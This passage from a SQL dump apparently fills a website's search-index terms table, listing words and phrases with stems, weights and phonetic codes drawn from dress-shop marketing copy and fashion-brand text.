settings',0,1,1.7667,'I5363542352',1,'en'),(37298,'info can','info can',0,1,1.2667,'I5125',1,'en'),(37299,'info can be','info can be',0,1,1.3667,'I51251',1,'en'),(37300,'infusing','infus',0,0,0.5333,'I51252',1,'en'),(37301,'infusing them','infus them',0,1,1.4333,'I5125235',1,'en'),(37302,'infusing them with','infus them with',0,1,1.6,'I51252353',1,'en'),(37303,'irregular','irregular',0,0,0.6,'I6246',1,'en'),(37304,'irregular in','irregular in',0,1,1.4,'I62465',1,'en'),(37305,'irregular in shape','irregular in shape',0,1,1.6,'I6246521',1,'en'),(37306,'is in first','is in first',0,1,1.3667,'I251623',1,'en'),(37307,'is one','is one',0,1,1.2,'I250',1,'en'),(37308,'is one of','is one of',0,1,1.3,'I251',1,'en'),(37309,'it comes','it comes',0,1,1.2667,'I3252',1,'en'),(37310,'it comes to','it comes to',0,1,1.3667,'I32523',1,'en'),(37311,'it manifests','it manifests',0,1,1.4,'I351232',1,'en'),(37312,'it manifests in','it manifests in',0,1,1.5,'I3512325',1,'en'),(37313,'just looking','just looking',0,1,1.4,'J34252',1,'en'),(37314,'just looking for','just looking for',0,1,1.5333,'J3425216',1,'en'),(37315,'just some','just some',0,1,1.3,'J325',1,'en'),(37316,'just some of','just some of',0,1,1.4,'J3251',1,'en'),(37317,'kick','kick',0,0,0.2667,'K000',1,'en'),(37318,'kick off','kick off',0,1,1.2667,'K100',1,'en'),(37319,'kick off your','kick off your',0,1,1.4333,'K160',1,'en'),(37320,'lace','lace',0,0,0.2667,'L200',1,'en'),(37321,'lace or','lace or',0,1,1.2333,'L260',1,'en'),(37322,'lace or adornments','lace or adornments',0,1,1.6,'L2636532',1,'en'),(37323,'list of fashion','list of fashion',0,1,1.5,'L23125',1,'en'),(37324,'look and feel','look and feel',0,1,1.4333,'L25314',1,'en'),(37325,'look whether','look whether',0,1,1.4,'L236',1,'en'),(37326,'look whether it','look whether it',0,1,1.5,'L2363',1,'en'),(37327,'looking','look',0,0,0.4667,'L252',3,'en'),(37328,'looking for','look for',0,1,1.3667,'L25216',1,'en'),(37329,'looking for a','look for a',0,1,1.4333,'L25216',1,'en'),(37330,'looking through','look through',0,1,1.5,'L252362',1,'en'),(37331,'looking through the','look through the',0,1,1.6333,'L2523623',1,'en'),(37332,'love ruching','love ruching',0,1,1.4,'L16252',1,'en'),(37333,'love ruching tiered','love ruching tiered',0,1,1.6333,'L16252363',1,'en'),(37334,'luxe','lux',0,0,0.2667,'L200',1,'en'),(37335,'luxe textiles','lux textiles',0,1,1.4333,'L232342',1,'en'),(37336,'luxe textiles are','lux textiles are',0,1,1.5667,'L2323426',1,'en'),(37337,'make this','make this',0,1,1.3,'M232',1,'en'),(37338,'make this collection','make this collection',0,1,1.6667,'M2324235',1,'en'),(37339,'making versatile','make versatile',0,1,1.5333,'M25216234',1,'en'),(37340,'making versatile and','make versatile and',0,1,1.6667,'M2521623453',1,'en'),(37341,'manifests','manifest',0,0,0.6,'M1232',1,'en'),(37342,'manifests in','manifest in',0,1,1.4,'M12325',1,'en'),(37343,'manifests in the','manifest in the',0,1,1.5333,'M123253',1,'en'),(37344,'many more','mani more',0,1,1.3,'M600',1,'en'),(37345,'many more and','mani more and',0,1,1.4333,'M653',1,'en'),(37346,'many women this','mani women this',0,1,1.5,'M320',1,'en'),(37347,'marriage prom','marriag prom',0,1,1.4333,'M62165',1,'en'),(37348,'marriage prom dresses','marriag prom dresses',0,1,1.7,'M62165362',1,'en'),(37349,'more and significantly','more and significantly',0,1,1.7333,'M6532512534',1,'en'),(37350,'mother of','mother of',0,1,1.3,'M361',1,'en'),(37351,'mother of the','mother of the',0,1,1.4333,'M3613',1,'en'),(37352,'must have list','must have list',0,1,1.4667,'M231423',1,'en'),(37353,'new this','new this',0,1,1.2667,'N320',1,'en'),(37354,'new this info','new this info',0,1,1.4333,'N3251',1,'en'),(37355,'noondress','noondress',0,0,0.6,'N362',1,'en'),(37356,'noondress can','noondress can',0,1,1.4333,'N3625',1,'en'),(37357,'noondress can be','noondress can be',0,1,1.5333,'N36251',1,'en'),(37358,'of adding','of adding',0,1,1.3,'O1352',1,'en'),(37359,'of adding today\'s','of adding today',0,1,1.5667,'O135232',1,'en'),(37360,'of being','of being',0,1,1.2667,'O152',1,'en'),(37361,'of being delighted','of being delighted',0,1,1.6,'O1523423',1,'en'),(37362,'of bridal','of bridal',0,1,1.3,'O1634',1,'en'),(37363,'of bridal gowns','of bridal gowns',0,1,1.5,'O1634252',1,'en'),(37364,'of choices','of choices',0,1,1.3333,'O120',1,'en'),(37365,'of choices and','of choices and',0,1,1.4667,'O1253',1,'en'),(37366,'of design','of design',0,1,1.3,'O1325',1,'en'),(37367,'of design many','of design many',0,1,1.4667,'O1325',1,'en'),(37368,'of elegance','of elegance',0,1,1.3667,'O14252',1,'en'),(37369,'of elegance and','of elegance and',0,1,1.5,'O1425253',1,'en'),(37370,'of fashion','of fashion',0,1,1.3333,'O125',1,'en'),(37371,'of fashion criteria','of fashion criteria',0,1,1.6333,'O1252636',1,'en'),(37372,'of her','of her',0,1,1.2,'O160',2,'en'),(37373,'of her marriage','of her marriage',0,1,1.5,'O16562',1,'en'),(37374,'of ruffles','of ruffles',0,1,1.3333,'O16142',1,'en'),(37375,'of ruffles prom','of ruffles prom',0,1,1.5,'O16142165',1,'en'),(37376,'of something','of something',0,1,1.4,'O125352',1,'en'),(37377,'of something funky','of something funky',0,1,1.6,'O125352152',1,'en'),(37378,'of the bridal','of the bridal',0,1,1.4333,'O131634',1,'en'),(37379,'of these two','of these two',0,1,1.4,'O1323',1,'en'),(37380,'of things','of things',0,1,1.3,'O1352',2,'en'),(37381,'of things that','of things that',0,1,1.4667,'O13523',1,'en'),(37382,'of your gown','of your gown',0,1,1.4,'O1625',1,'en'),(37383,'of your life','of your life',0,1,1.4,'O1641',1,'en'),(37384,'off your','off your',0,1,1.2667,'O160',1,'en'),(37385,'off your figure','off your figure',0,1,1.5,'O16126',1,'en'),(37386,'off your search','off your search',0,1,1.5,'O16262',1,'en'),(37387,'on crucial','on crucial',0,1,1.3333,'O52624',1,'en'),(37388,'on crucial day','on crucial day',0,1,1.4667,'O526243',1,'en'),(37389,'on the eve','on the eve',0,1,1.3333,'O531',1,'en'),(37390,'on the must','on the must',0,1,1.3667,'O53523',1,'en'),(37391,'one of elegance','on of elegance',0,1,1.5,'O514252',1,'en'),(37392,'one that','on that',0,1,1.2667,'O530',1,'en'),(37393,'one that will','on that will',0,1,1.4333,'O534',1,'en'),(37394,'options and','option and',0,1,1.3667,'O135253',1,'en'),(37395,'options and pick','option and pick',0,1,1.5333,'O13525312',1,'en'),(37396,'or adornments','or adornments',0,1,1.4333,'O636532',1,'en'),(37397,'or adornments to','or adornments to',0,1,1.5333,'O6365323',1,'en'),(37398,'or just','or just',0,1,1.2333,'O623',1,'en'),(37399,'or just looking','or just looking',0,1,1.5,'O6234252',1,'en'),(37400,'or other detail','or other detail',0,1,1.5,'O63634',1,'en'),(37401,'order around','order around',0,1,1.4,'O63653',1,'en'),(37402,'order around the','order around the',0,1,1.5333,'O63653',1,'en'),(37403,'other detail','other detail',0,1,1.4,'O3634',1,'en'),(37404,'other detail in','other detail in',0,1,1.5,'O36345',1,'en'),(37405,'our designs','our designs',0,1,1.3667,'O63252',1,'en'),(37406,'our designs in','our designs in',0,1,1.4667,'O632525',1,'en'),(37407,'our designs such','our designs such',0,1,1.5333,'O63252',1,'en'),(37408,'our dresses','our dresses',0,1,1.3667,'O6362',1,'en'),(37409,'our dresses is','our dresses is',0,1,1.4667,'O6362',1,'en'),(37410,'outfit','outfit',0,0,0.4,'O313',2,'en'),(37411,'outfit and','outfit and',0,1,1.3333,'O31353',1,'en'),(37412,'outfit and specially','outfit and specially',0,1,1.6667,'O313532124',1,'en'),(37413,'overall impression','overal impression',0,1,1.6,'O16451625',1,'en'),(37414,'overall impression is','overal impression is',0,1,1.7,'O164516252',1,'en'),(37415,'overall there','overal there',0,1,1.4333,'O16436',1,'en'),(37416,'overall there are','overal there are',0,1,1.5667,'O16436',1,'en'),(37417,'owner to','owner to',0,1,1.2667,'O563',1,'en'),(37418,'owner to the','owner to the',0,1,1.4,'O563',1,'en'),(37419,'participants','particip',0,0,0.8,'P6321532',1,'en'),(37420,'participants they\'re','particip they',0,1,1.6667,'P632153236',1,'en'),(37421,'participants they\'re a','particip they a',0,1,1.7333,'P632153236',1,'en'),(37422,'party dresses','parti dresses',0,1,1.4333,'P6362',1,'en'),(37423,'party dresses or','parti dresses or',0,1,1.5333,'P63626',1,'en'),(37424,'pick the one','pick the one',0,1,1.4,'P235',1,'en'),(37425,'place on the','place on the',0,1,1.4,'P4253',1,'en'),(37426,'price and','price and',0,1,1.3,'P6253',1,'en'),(37427,'price and appearance','price and appearance',0,1,1.6667,'P62531652',1,'en'),(37428,'prom','prom',0,0,0.2667,'P650',2,'en'),(37429,'prom bridesmaid','prom bridesmaid',0,1,1.5,'P65163253',1,'en'),(37430,'prom bridesmaid dresses','prom bridesmaid dresses',0,1,1.7667,'P6516325362',1,'en'),(37431,'prom bridesmiad','prom bridesmiad',0,1,1.5,'P65163253',1,'en'),(37432,'prom bridesmiad gowns','prom bridesmiad gowns',0,1,1.7,'P65163253252',1,'en'),(37433,'prom dresses','prom dresses',0,1,1.4,'P65362',2,'en'),(37434,'prom dresses 2013','prom dresses 2013',0,1,1.5667,'P65362',1,'en'),(37435,'prom dresses quinceanera','prom dresses quinceanera',0,1,1.8,'P653625256',1,'en'),(37436,'prom dresses under','prom dresses under',0,1,1.6,'P65362536',1,'en'),(37437,'promotion flower','promot flower',0,1,1.5333,'P6535146',1,'en'),(37438,'promotion flower girl','promot flower girl',0,1,1.7,'P6535146264',1,'en'),(37439,'put together','put together',0,1,1.4,'P3236',1,'en'),(37440,'put together to','put together to',0,1,1.5,'P32363',1,'en'),(37441,'quinceanera','quinceanera',0,0,0.7333,'Q5256',1,'en'),(37442,'quinceanera dresses','quinceanera dresses',0,1,1.6333,'Q5256362',1,'en'),(37443,'quinceanera dresses tropical','quinceanera dresses tropical',0,1,1.9333,'Q525636236124',1,'en'),(37444,'robes','robe',0,0,0.3333,'R120',1,'en'),(37445,'robes blossom','robe blossom',0,1,1.4333,'R121425',1,'en'),(37446,'robes blossom girl','robe blossom girl',0,1,1.6,'R121425264',1,'en'),(37447,'robust','robust',0,0,0.4,'R123',1,'en'),(37448,'robust can','robust can',0,1,1.3333,'R12325',1,'en'),(37449,'robust can seem','robust can seem',0,1,1.5,'R1232525',1,'en'),(37450,'ruching','ruch',0,0,0.4667,'R252',1,'en'),(37451,'ruching tiered','ruch tiered',0,1,1.4667,'R252363',1,'en'),(37452,'ruching tiered coatings','ruch tiered coatings',0,1,1.7667,'R2523632352',1,'en'),(37453,'ruffles','ruffl',0,0,0.4667,'R142',1,'en'),(37454,'ruffles prom','ruffl prom',0,1,1.4,'R142165',1,'en'),(37455,'ruffles prom dresses','ruffl prom dresses',0,1,1.6667,'R142165362',1,'en'),(37456,'sale bridal','sale bridal',0,1,1.3667,'S41634',1,'en'),(37457,'sale bridal dresses','sale bridal dresses',0,1,1.6333,'S41634362',1,'en'),(37458,'search','search',0,0,0.4,'S620',2,'en'),(37459,'search whether','search whether',0,1,1.4667,'S6236',1,'en'),(37460,'search whether you\'re','search whether you',0,1,1.7,'S6236',1,'en'),(37461,'season wearing','season wearing',0,1,1.4667,'S5652',1,'en'),(37462,'season wearing an','season wearing an',0,1,1.5667,'S56525',1,'en'),(37463,'seem impossible','seem impossible',0,1,1.5,'S51214',1,'en'),(37464,'seem impossible if','seem impossible if',0,1,1.6,'S512141',1,'en'),(37465,'settings while','set while',0,1,1.4667,'S3524',1,'en'),(37466,'settings while infusing','set while infusing',0,1,1.7667,'S352451252',1,'en'),(37467,'shape look','shape look',0,1,1.3333,'S142',1,'en'),(37468,'shape look whether','shape look whether',0,1,1.6,'S14236',1,'en'),(37469,'short party','short party',0,1,1.3667,'S63163',1,'en'),(37470,'short party dresses','short party dresses',0,1,1.6333,'S6316362',1,'en'),(37471,'show off your','show off your',0,1,1.4333,'S160',1,'en'),(37472,'significantly','significantli',0,0,0.8667,'S512534',1,'en'),(37473,'significantly we','significantli we',0,1,1.5333,'S512534',1,'en'),(37474,'significantly we add','significantli we add',0,1,1.6667,'S5125343',1,'en'),(37475,'so making','so making',0,1,1.3,'S5252',1,'en'),(37476,'so making versatile','so making versatile',0,1,1.6333,'S525216234',1,'en'),(37477,'some of','some of',0,1,1.2333,'S510',1,'en'),(37478,'some of things','some of things',0,1,1.4667,'S51352',1,'en'),(37479,'something funky','someth funky',0,1,1.5,'S5352152',1,'en'),(37480,'something funky and','someth funky and',0,1,1.6333,'S535215253',1,'en'),(37481,'something unexpected','someth unexpected',0,1,1.6667,'S535252123',1,'en'),(37482,'something unexpected to','someth unexpected to',0,1,1.7667,'S535252123',1,'en'),(37483,'specially','special',0,0,0.6,'S124',1,'en'),(37484,'specially when','special when',0,1,1.4667,'S1245',1,'en'),(37485,'specially when it','special when it',0,1,1.5667,'S12453',1,'en'),(37486,'spirit','spirit',0,0,0.4,'S163',1,'en'),(37487,'spirit of','spirit of',0,1,1.3,'S1631',1,'en'),(37488,'spirit of something','spirit of something',0,1,1.6333,'S163125352',1,'en'),(37489,'standout','standout',0,0,0.5333,'S353',1,'en'),(37490,'standout in','standout in',0,1,1.3667,'S3535',1,'en'),(37491,'standout in the','standout in the',0,1,1.5,'S35353',1,'en'),(37492,'styles','style',0,0,0.4,'S342',1,'en'),(37493,'styles for','style for',0,1,1.3333,'S34216',1,'en'),(37494,'styles for all','style for all',0,1,1.4667,'S342164',1,'en'),(37495,'such as lace','such as lace',0,1,1.4,'S420',1,'en'),(37496,'supply','suppli',0,0,0.4,'S140',2,'en'),(37497,'supply top','suppli top',0,1,1.3333,'S1431',1,'en'),(37498,'supply top sale','suppli top sale',0,1,1.5,'S143124',1,'en'),(37499,'sure of','sure of',0,1,1.2333,'S610',1,'en'),(37500,'sure of being','sure of being',0,1,1.4333,'S6152',1,'en'),(37501,'sure to','sure to',0,1,1.2333,'S630',1,'en'),(37502,'sure to look','sure to look',0,1,1.4,'S6342',1,'en'),(37503,'textiles','textil',0,0,0.5333,'T2342',1,'en'),(37504,'textiles are','textil are',0,1,1.4,'T23426',1,'en'),(37505,'textiles are just','textil are just',0,1,1.5667,'T2342623',1,'en'),(37506,'that make','that make',0,1,1.3,'T520',1,'en'),(37507,'that make this','that make this',0,1,1.4667,'T5232',1,'en'),(37508,'the band','the band',0,1,1.2667,'T153',1,'en'),(37509,'the band the','the band the',0,1,1.4,'T153',1,'en'),(37510,'the best the','the best the',0,1,1.4,'T123',1,'en'),(37511,'the bridal','the bridal',0,1,1.3333,'T1634',1,'en'),(37512,'the bridal dresses','the bridal dresses',0,1,1.6,'T1634362',1,'en'),(37513,'the collection we\'ve','the collection we',0,1,1.6667,'T242351',1,'en'),(37514,'the collections','the collections',0,1,1.5,'T242352',1,'en'),(37515,'the collections at','the collections at',0,1,1.6,'T2423523',1,'en'),(37516,'the dresses','the dresses',0,1,1.3667,'T620',1,'en'),(37517,'the dresses short','the dresses short',0,1,1.5667,'T6263',1,'en'),(37518,'the eve','the eve',0,1,1.2333,'T100',1,'en'),(37519,'the eve of','the eve of',0,1,1.3333,'T100',1,'en'),(37520,'the irregular','the irregular',0,1,1.4333,'T6246',1,'en'),(37521,'the irregular in','the irregular in',0,1,1.5333,'T62465',1,'en'),(37522,'the must','the must',0,1,1.2667,'T523',1,'en'),(37523,'the must have','the must have',0,1,1.4333,'T5231',1,'en'),(37524,'the one','the one',0,1,1.2333,'T500',1,'en'),(37525,'the one that','the one that',0,1,1.4,'T530',1,'en'),(37526,'the price','the price',0,1,1.3,'T162',1,'en'),(37527,'the price and','the price and',0,1,1.4333,'T16253',1,'en'),(37528,'the spirit','the spirit',0,1,1.3333,'T2163',1,'en'),(37529,'the spirit of','the spirit of',0,1,1.4333,'T21631',1,'en'),(37530,'the today','the today',0,1,1.3,'T000',1,'en'),(37531,'the today available','the today available',0,1,1.6333,'T1414',1,'en'),(37532,'the wedding','the wedding',0,1,1.3667,'T520',1,'en'),(37533,'the wedding traditions','the wedding traditions',0,1,1.7333,'T5236352',1,'en'),(37534,'the world of','the world of',0,1,1.4,'T6431',1,'en'),(37535,'them with','them with',0,1,1.3,'T530',1,'en'),(37536,'them with the','them with the',0,1,1.4333,'T530',1,'en'),(37537,'then looking','then looking',0,1,1.4,'T54252',1,'en'),(37538,'then looking through','then looking through',0,1,1.6667,'T54252362',1,'en'),(37539,'there are thousands','there are thousands',0,1,1.6333,'T632532',1,'en'),(37540,'these two','these two',0,1,1.3,'T230',1,'en'),(37541,'these two iconic','these two iconic',0,1,1.5333,'T23252',1,'en'),(37542,'they\'re a','thei a',0,1,1.3,'T600',1,'en'),(37543,'they\'re a way','thei a way',0,1,1.4333,'T600',1,'en'),(37544,'things that','thing that',0,1,1.3667,'T523',1,'en'),(37545,'things that make','thing that make',0,1,1.5333,'T52352',1,'en'),(37546,'this collection','thi collection',0,1,1.5,'T24235',1,'en'),(37547,'this collection of','thi collection of',0,1,1.6,'T242351',1,'en'),(37548,'this info','thi info',0,1,1.3,'T251',1,'en'),(37549,'this info can','thi info can',0,1,1.4333,'T25125',1,'en'),(37550,'this season','thi season',0,1,1.3667,'T250',1,'en'),(37551,'this season wearing','thi season wearing',0,1,1.6333,'T25652',1,'en'),(37552,'thousands of choices','thousand of choices',0,1,1.6667,'T253212',1,'en'),(37553,'through the collections','through the collections',0,1,1.7667,'T623242352',1,'en'),(37554,'tiered','tier',0,0,0.4,'T630',1,'en'),(37555,'tiered coatings','tier coatings',0,1,1.5,'T632352',1,'en'),(37556,'tiered coatings of','tier coatings of',0,1,1.6,'T6323521',1,'en'),(37557,'to be sure','to be sure',0,1,1.3333,'T126',1,'en'),(37558,'to consider','to consider',0,1,1.3667,'T25236',1,'en'),(37559,'to consider all','to consider all',0,1,1.5,'T252364',1,'en'),(37560,'to holding','to holding',0,1,1.3333,'T4352',1,'en'),(37561,'to holding weddings','to holding weddings',0,1,1.6333,'T4352352',1,'en'),(37562,'to kick','to kick',0,1,1.2333,'T200',1,'en'),(37563,'to kick off','to kick off',0,1,1.3667,'T210',1,'en'),(37564,'to look','to look',0,1,1.2333,'T420',2,'en'),(37565,'to look and','to look and',0,1,1.3667,'T4253',1,'en'),(37566,'to our designs','to our designs',0,1,1.4667,'T63252',1,'en'),(37567,'to the wedding','to the wedding',0,1,1.4667,'T520',1,'en'),(37568,'to your outfit','to your outfit',0,1,1.4667,'T6313',1,'en'),(37569,'today available','todai available',0,1,1.5,'T1414',1,'en'),(37570,'today available overall','todai available overall',0,1,1.7667,'T1414164',1,'en'),(37571,'today\'s truck','todai truck',0,1,1.4333,'T2362',1,'en'),(37572,'today\'s truck owner','todai truck owner',0,1,1.6333,'T236256',1,'en'),(37573,'together to','togeth to',0,1,1.3667,'T2363',1,'en'),(37574,'together to consider','togeth to consider',0,1,1.6667,'T236325236',1,'en'),(37575,'top sale','top sale',0,1,1.2667,'T124',1,'en'),(37576,'top sale bridal','top sale bridal',0,1,1.5,'T1241634',1,'en'),(37577,'traditional settings','tradit settings',0,1,1.6667,'T63542352',1,'en'),(37578,'traditional settings while','tradit settings while',0,1,1.8667,'T635423524',1,'en'),(37579,'traditions','tradit',0,0,0.6667,'T6352',1,'en'),(37580,'traditions you','tradit you',0,1,1.4667,'T6352',1,'en'),(37581,'traditions you love','tradit you love',0,1,1.6333,'T635241',1,'en'),(37582,'tropical','tropic',0,0,0.5333,'T6124',1,'en'),(37583,'tropical drink','tropic drink',0,1,1.4667,'T61243652',1,'en'),(37584,'tropical drink dresses','tropic drink dresses',0,1,1.7333,'T61243652362',1,'en'),(37585,'truck','truck',0,0,0.3333,'T620',1,'en'),(37586,'truck owner','truck owner',0,1,1.3667,'T6256',1,'en'),(37587,'truck owner to','truck owner to',0,1,1.4667,'T62563',1,'en'),(37588,'truly standout','truli standout',0,1,1.4667,'T642353',1,'en'),(37589,'truly standout in','truli standout in',0,1,1.5667,'T6423535',1,'en'),(37590,'two iconic','two iconic',0,1,1.3333,'T252',1,'en'),(37591,'two iconic colors','two iconic colors',0,1,1.5667,'T252462',1,'en'),(37592,'under 100','under 100',0,1,1.3,'U536',1,'en'),(37593,'under 100 beautifully','under 100 beautifully',0,1,1.7,'U5361314',1,'en'),(37594,'unexpected','unexpect',0,0,0.6667,'U52123',1,'en'),(37595,'unexpected to','unexpect to',0,1,1.4333,'U52123',1,'en'),(37596,'unexpected to your','unexpect to your',0,1,1.6,'U521236',1,'en'),(37597,'use the','us the',0,1,1.2333,'U230',1,'en'),(37598,'use the collection','us the collection',0,1,1.6,'U2324235',1,'en'),(37599,'versatile','versatil',0,0,0.6,'V6234',1,'en'),(37600,'versatile and','versatil and',0,1,1.4333,'V623453',1,'en'),(37601,'versatile and robust','versatil and robust',0,1,1.6667,'V6234536123',1,'en'),(37602,'want to be','want to be',0,1,1.3333,'W531',1,'en'),(37603,'way of','wai of',0,1,1.2,'W100',1,'en'),(37604,'way of adding','wai of adding',0,1,1.4333,'W1352',1,'en'),(37605,'way to kick','wai to kick',0,1,1.3667,'W320',1,'en'),(37606,'we add','we add',0,1,1.2,'W300',1,'en'),(37607,'we add beautiful','we add beautiful',0,1,1.5333,'W31314',1,'en'),(37608,'we\'ve','we',0,0,0.3333,'W100',1,'en'),(37609,'we\'ve put','we put',0,1,1.3,'W130',1,'en'),(37610,'we\'ve put together','we put together',0,1,1.6,'W13236',1,'en'),(37611,'wearing an','wear an',0,1,1.3333,'W6525',1,'en'),(37612,'wearing an asymmetrical','wear an asymmetrical',0,1,1.7667,'W6525253624',1,'en'),(37613,'wedding dresses 2013','wed dresses 2013',0,1,1.6667,'W352362',1,'en'),(37614,'wedding or','wed or',0,1,1.3333,'W3526',1,'en'),(37615,'wedding or just','wed or just',0,1,1.5,'W352623',1,'en'),(37616,'wedding participants','wed participants',0,1,1.6667,'W35216321532',1,'en'),(37617,'wedding participants they\'re','wed participants they',0,1,1.9333,'W3521632153236',1,'en'),(37618,'wedding prom','wed prom',0,1,1.4,'W352165',1,'en'),(37619,'wedding prom bridesmaid','wed prom bridesmaid',0,1,1.7667,'W352165163253',1,'en'),(37620,'wedding traditions','wed traditions',0,1,1.6,'W35236352',1,'en'),(37621,'wedding traditions you','wed traditions you',0,1,1.7333,'W35236352',1,'en'),(37622,'wedding www','wed www',0,1,1.3667,'W352',1,'en'),(37623,'wedding www balfleet','wed www balfleet',0,1,1.6667,'W35214143',1,'en'),(37624,'weddings','wed',0,0,0.5333,'W352',2,'en'),(37625,'weddings in','wed in',0,1,1.3667,'W3525',1,'en'),(37626,'weddings in traditional','wed in traditional',0,1,1.7667,'W352536354',1,'en'),(37627,'when it','when it',0,1,1.2333,'W530',1,'en'),(37628,'when it comes','when it comes',0,1,1.4333,'W53252',1,'en'),(37629,'whether it','whether it',0,1,1.3333,'W363',1,'en'),(37630,'whether it manifests','whether it manifests',0,1,1.6667,'W36351232',1,'en'),(37631,'whether you\'re','whether you',0,1,1.4667,'W360',1,'en'),(37632,'whether you\'re a','whether you a',0,1,1.5333,'W360',1,'en'),(37633,'while infusing','while infusing',0,1,1.4667,'W451252',1,'en'),(37634,'while infusing them','while infusing them',0,1,1.6333,'W45125235',1,'en'),(37635,'will be sure','will be sure',0,1,1.4,'W4126',1,'en'),(37636,'will show off','will show off',0,1,1.4333,'W421',1,'en'),(37637,'with the spirit','with the spirit',0,1,1.5,'W32163',1,'en'),(37638,'women on','women on',0,1,1.2667,'W500',1,'en'),(37639,'women on the','women on the',0,1,1.4,'W530',1,'en'),(37640,'women this','women this',0,1,1.3333,'W532',2,'en'),(37641,'women this season','women this season',0,1,1.5667,'W5325',1,'en'),(37642,'world of','world of',0,1,1.2667,'W6431',1,'en'),(37643,'world of design','world of design',0,1,1.5,'W6431325',1,'en'),(37644,'you love','you love',0,1,1.2667,'Y410',1,'en'),(37645,'you love ruching','you love ruching',0,1,1.5333,'Y416252',1,'en'),(37646,'you will be','you will be',0,1,1.3667,'Y410',1,'en'),(37647,'you\'re a','you a',0,1,1.2667,'Y600',1,'en'),(37648,'you\'re a wedding','you a wedding',0,1,1.5333,'Y6352',1,'en'),(37649,'younger','younger',0,0,0.4667,'Y526',1,'en'),(37650,'younger brides','younger brides',0,1,1.4667,'Y5261632',1,'en'),(37651,'younger brides and','younger brides and',0,1,1.6,'Y526163253',1,'en'),(37652,'your best','your best',0,1,1.3,'Y6123',1,'en'),(37653,'your best on','your best on',0,1,1.4,'Y61235',1,'en'),(37654,'your figure','your figure',0,1,1.3667,'Y6126',1,'en'),(37655,'your figure the','your figure the',0,1,1.5,'Y61263',1,'en'),(37656,'your gown','your gown',0,1,1.3,'Y625',1,'en'),(37657,'your gown then','your gown then',0,1,1.4667,'Y62535',1,'en'),(37658,'your life','your life',0,1,1.3,'Y641',1,'en'),(37659,'your options','your options',0,1,1.4,'Y61352',1,'en'),(37660,'your options and','your options and',0,1,1.5333,'Y6135253',1,'en'),(37661,'your outfit','your outfit',0,1,1.3667,'Y6313',2,'en'),(37662,'your outfit and','your outfit and',0,1,1.5,'Y631353',1,'en'),(37663,'your search','your search',0,1,1.3667,'Y6262',1,'en'),(37664,'your search whether','your search whether',0,1,1.6333,'Y626236',1,'en'),(37665,'1 the','1 the',0,1,1.1667,'T000',1,'en'),(37666,'1 the word','1 the word',0,1,1.3333,'T630',1,'en'),(37667,'124','124',0,0,0.3,'',1,'en'),(37668,'2 ready','2 ready',0,1,1.2333,'R300',1,'en'),(37669,'2 ready not','2 ready not',0,1,1.3667,'R353',1,'en'),(37670,'2002','2002',0,0,0.4,'',1,'en'),(37671,'2002 oscar','2002 oscar',0,1,1.3333,'O260',1,'en'),(37672,'2002 oscar de','2002 oscar de',0,1,1.4333,'O263',1,'en'),(37673,'8 different','8 different',0,1,1.3667,'D1653',1,'en'),(37674,'8 different designers','8 different designers',0,1,1.7,'D16532562',1,'en'),(37675,'a certain','a certain',0,1,1.3,'A2635',1,'en'),(37676,'a certain background','a certain background',0,1,1.6667,'A263512653',1,'en'),(37677,'a certain class','a certain class',0,1,1.5,'A2635242',1,'en'),(37678,'a choice','a choice',0,1,1.2667,'A200',1,'en'),(37679,'a choice that','a choice that',0,1,1.4333,'A230',1,'en'),(37680,'a fabulous','a fabulous',0,1,1.3333,'A142',1,'en'),(37681,'a fabulous some','a fabulous some',0,1,1.5,'A1425',1,'en'),(37682,'a line','a line',0,1,1.2,'A450',1,'en'),(37683,'a line from','a line from',0,1,1.3667,'A45165',1,'en'),(37684,'a new kennedys','a new kennedys',0,1,1.4667,'A52532',1,'en'),(37685,'a person or','a person or',0,1,1.3667,'A16256',1,'en'),(37686,'a preppy','a preppy',0,1,1.2667,'A161',1,'en'),(37687,'a preppy college','a preppy college',0,1,1.5333,'A161242',1,'en'),(37688,'a school','a school',0,1,1.2667,'A240',1,'en'),(37689,'a school eliteness','a school eliteness',0,1,1.6,'A24352',1,'en'),(37690,'a short','a short',0,1,1.2333,'A263',2,'en'),(37691,'a short while','a short while',0,1,1.4333,'A2634',2,'en'),(37692,'a term','a term',0,1,1.2,'A365',1,'en'),(37693,'a term that','a term that',0,1,1.3667,'A3653',1,'en'),(37694,'a top','a top',0,1,1.1667,'A310',1,'en'),(37695,'a top tied','a top tied',0,1,1.3333,'A313',1,'en'),(37696,'a trend','a trend',0,1,1.2333,'A3653',2,'en'),(37697,'a trend before','a trend before',0,1,1.4667,'A365316',1,'en'),(37698,'a until','a until',0,1,1.2333,'A534',1,'en'),(37699,'a until i','a until i',0,1,1.3,'A534',1,'en'),(37700,'abercrombie','abercrombi',0,0,0.7333,'A162651',1,'en'),(37701,'abercrombie and','abercrombi and',0,1,1.5,'A16265153',1,'en'),(37702,'abercrombie and hollister','abercrombi and hollister',0,1,1.8333,'A162651534236',1,'en'),(37703,'abercrombie hollister','abercrombi hollister',0,1,1.7,'A1626514236',1,'en'),(37704,'abercrombie hollister and','abercrombi hollister and',0,1,1.8333,'A162651423653',1,'en'),(37705,'abercrombie hollister it','abercrombi hollister it',0,1,1.8,'A16265142363',1,'en'),(37706,'abercromibe','abercromib',0,0,0.7333,'A162651',1,'en'),(37707,'abercromibe what','abercromib what',0,1,1.5333,'A1626513',1,'en'),(37708,'abercromibe what is','abercromib what is',0,1,1.6333,'A16265132',1,'en'),(37709,'about what','about what',0,1,1.3333,'A130',1,'en'),(37710,'about what you','about what you',0,1,1.4667,'A130',1,'en'),(37711,'actually ralph','actual ralph',0,1,1.4667,'A234641',1,'en'),(37712,'actually ralph lauren','actual ralph lauren',0,1,1.7,'A234641465',1,'en'),(37713,'af','af',0,0,0.1333,'A100',1,'en'),(37714,'af and','af and',0,1,1.2,'A153',1,'en'),(37715,'af and hollister','af and hollister',0,1,1.5333,'A1534236',1,'en'),(37716,'ago gay','ago gay',0,1,1.2333,'A200',1,'en'),(37717,'ago gay use','ago gay use',0,1,1.3667,'A200',1,'en'),(37718,'along with so','along with so',0,1,1.4333,'A45232',1,'en'),(37719,'also blithely','also blithely',0,1,1.4333,'A421434',1,'en'),(37720,'also blithely unaware','also blithely unaware',0,1,1.7,'A42143456',1,'en'),(37721,'also highlights','also highlights',0,1,1.5,'A424232',1,'en'),(37722,'also highlights deference','also highlights deference',0,1,1.8333,'A42423231652',1,'en'),(37723,'always of','alwai of',0,1,1.3,'A421',1,'en'),(37724,'always of thebelief','alwai of thebelief',0,1,1.6333,'A4213141',1,'en'),(37725,'amount of cerulean','amount of cerulean',0,1,1.6,'A5312645',1,'en'),(37726,'amounts','amount',0,0,0.4667,'A532',1,'en'),(37727,'amounts 